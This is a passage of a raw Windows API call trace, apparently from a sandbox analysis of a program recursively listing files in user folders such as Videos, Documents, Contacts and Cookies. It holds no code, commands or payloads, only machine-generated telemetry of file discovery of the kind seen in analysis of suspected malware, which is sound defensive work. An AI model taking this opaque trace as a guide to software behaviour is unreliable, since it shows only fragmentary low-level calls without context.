lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x925505f0, ftCreationTime.dwHighDateTime=0x1d5db06, ftLastAccessTime.dwLowDateTime=0x2b7e4d50, ftLastAccessTime.dwHighDateTime=0x1d5d818, ftLastWriteTime.dwLowDateTime=0x2b7e4d50, ftLastWriteTime.dwHighDateTime=0x1d5d818, nFileSizeHigh=0x0, nFileSizeLow=0x175e4, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="adAkRf.mkv", cAlternateFileName="")) returned 1 [0184.528] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.529] lstrlenW (lpString="adAkRf.mkv") returned 10 [0184.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\fAXmu4YE5\\*", lpFindFileData=0x713310 | out: lpFindFileData=0x713310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd65070, ftCreationTime.dwHighDateTime=0x1d5df57, ftLastAccessTime.dwLowDateTime=0xb857fd40, ftLastAccessTime.dwHighDateTime=0x1d5dc7b, ftLastWriteTime.dwLowDateTime=0xb857fd40, ftLastWriteTime.dwHighDateTime=0x1d5dc7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebde0 [0184.529] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x713310 | out: lpFindFileData=0x713310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd65070, ftCreationTime.dwHighDateTime=0x1d5df57, ftLastAccessTime.dwLowDateTime=0xb857fd40, ftLastAccessTime.dwHighDateTime=0x1d5dc7b, ftLastWriteTime.dwLowDateTime=0xb857fd40, ftLastWriteTime.dwHighDateTime=0x1d5dc7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.529] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.529] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x713310 | out: lpFindFileData=0x713310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91910790, ftCreationTime.dwHighDateTime=0x1d5dae3, ftLastAccessTime.dwLowDateTime=0x223ce10, ftLastAccessTime.dwHighDateTime=0x1d5dc6b, ftLastWriteTime.dwLowDateTime=0x223ce10, ftLastWriteTime.dwHighDateTime=0x1d5dc6b, nFileSizeHigh=0x0, nFileSizeLow=0x5931, dwReserved0=0x0, dwReserved1=0x0, cFileName="ANN7xy_5U4o6Q.avi", cAlternateFileName="ANN7XY~1.AVI")) returned 1 [0184.529] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.529] lstrlenW (lpString="ANN7xy_5U4o6Q.avi") returned 17 [0184.529] FindClose (in: hFindFile=0x6ebde0 | out: hFindFile=0x6ebde0) returned 1 [0184.529] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713310 | out: hHeap=0x6b0000) returned 1 [0184.530] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd91cb70, ftCreationTime.dwHighDateTime=0x1d5e7a4, ftLastAccessTime.dwLowDateTime=0x8d00ee30, ftLastAccessTime.dwHighDateTime=0x1d5e451, ftLastWriteTime.dwLowDateTime=0x8d00ee30, ftLastWriteTime.dwHighDateTime=0x1d5e451, nFileSizeHigh=0x0, nFileSizeLow=0x11cc5, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="Ublc3HNGSf.mp4", cAlternateFileName="UBLC3H~1.MP4")) returned 1 [0184.530] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.530] lstrlenW (lpString="Ublc3HNGSf.mp4") returned 14 [0184.530] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.530] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.530] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe06e64c0, ftCreationTime.dwHighDateTime=0x1d5e1e1, ftLastAccessTime.dwLowDateTime=0x380edef0, ftLastAccessTime.dwHighDateTime=0x1d5e299, ftLastWriteTime.dwLowDateTime=0x380edef0, ftLastWriteTime.dwHighDateTime=0x1d5e299, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="YCDk", cAlternateFileName="")) returned 0 [0184.530] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.530] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.530] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da98c0, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xd5f94840, ftLastAccessTime.dwHighDateTime=0x1d5dbc2, ftLastWriteTime.dwLowDateTime=0xd5f94840, ftLastWriteTime.dwHighDateTime=0x1d5dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="_SoPIISM9TrXq0w", cAlternateFileName="_SOPII~1")) returned 0 [0184.530] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.530] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.530] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf98de0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf98de0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0184.530] FindClose (in: hFindFile=0x6ebce0 | out: hFindFile=0x6ebce0) returned 1 [0184.530] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee5c8 | out: hHeap=0x6b0000) returned 1 [0184.531] FindNextFileW (in: hFindFile=0x6ebca0, lpFindFileData=0x6ecc60 | out: lpFindFileData=0x6ecc60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x5c003f, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0184.531] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.531] lstrlenW (lpString="All Users") returned 9 [0184.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebce0 [0184.531] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.531] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.531] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0184.531] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.531] lstrlenW (lpString="AppData") returned 7 [0184.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x704750, ftCreationTime.dwLowDateTime=0x713418, ftCreationTime.dwHighDateTime=0x1d5e1e1, ftLastAccessTime.dwLowDateTime=0x380edef0, ftLastAccessTime.dwHighDateTime=0x1d5e299, ftLastWriteTime.dwLowDateTime=0x380edef0, ftLastWriteTime.dwHighDateTime=0x1d5e299, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="YCDk", cAlternateFileName="")) returned 0xffffffff [0184.532] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.532] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0184.532] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.532] lstrlenW (lpString="Contacts") returned 8 [0184.532] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.533] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.533] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.533] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0184.533] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.533] lstrlenW (lpString="Administrator.contact") returned 21 [0184.533] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.533] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.533] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0184.533] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.533] lstrlenW (lpString="Cookies") returned 7 [0184.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x704750, ftCreationTime.dwLowDateTime=0x713418, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0184.533] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.533] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0184.534] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.534] lstrlenW (lpString="Desktop") returned 7 [0184.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.534] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.534] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.534] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.534] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.534] lstrlenW (lpString="desktop.ini") returned 11 [0184.535] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.535] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.535] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0184.535] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.535] lstrlenW (lpString="Documents") returned 9 [0184.535] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.536] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.536] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.536] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.536] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.536] lstrlenW (lpString="desktop.ini") returned 11 [0184.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x713418, ftCreationTime.dwHighDateTime=0x1d5d8c8, ftLastAccessTime.dwLowDateTime=0x8f433fa0, ftLastAccessTime.dwHighDateTime=0x1d5dae6, ftLastWriteTime.dwLowDateTime=0x8f433fa0, ftLastWriteTime.dwHighDateTime=0x1d5dae6, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="vTaRQvsjbndGDGxim5.swf", cAlternateFileName="VTARQV~1.SWF")) returned 0xffffffff [0184.537] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.537] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0184.537] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.537] lstrlenW (lpString="My Pictures") returned 11 [0184.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x713418, ftCreationTime.dwHighDateTime=0x1d5d8c8, ftLastAccessTime.dwLowDateTime=0x8f433fa0, ftLastAccessTime.dwHighDateTime=0x1d5dae6, ftLastWriteTime.dwLowDateTime=0x8f433fa0, ftLastWriteTime.dwHighDateTime=0x1d5dae6, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="vTaRQvsjbndGDGxim5.swf", cAlternateFileName="VTARQV~1.SWF")) returned 0xffffffff [0184.537] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.537] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0184.537] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.537] lstrlenW (lpString="My Videos") returned 9 [0184.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x713418, ftCreationTime.dwHighDateTime=0x1d5d8c8, ftLastAccessTime.dwLowDateTime=0x8f433fa0, ftLastAccessTime.dwHighDateTime=0x1d5dae6, ftLastWriteTime.dwLowDateTime=0x8f433fa0, ftLastWriteTime.dwHighDateTime=0x1d5dae6, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="vTaRQvsjbndGDGxim5.swf", cAlternateFileName="VTARQV~1.SWF")) returned 0xffffffff [0184.537] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.537] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0184.538] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.538] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.539] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0184.539] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.539] lstrlenW (lpString="Downloads") returned 9 [0184.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.539] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.539] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.539] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, 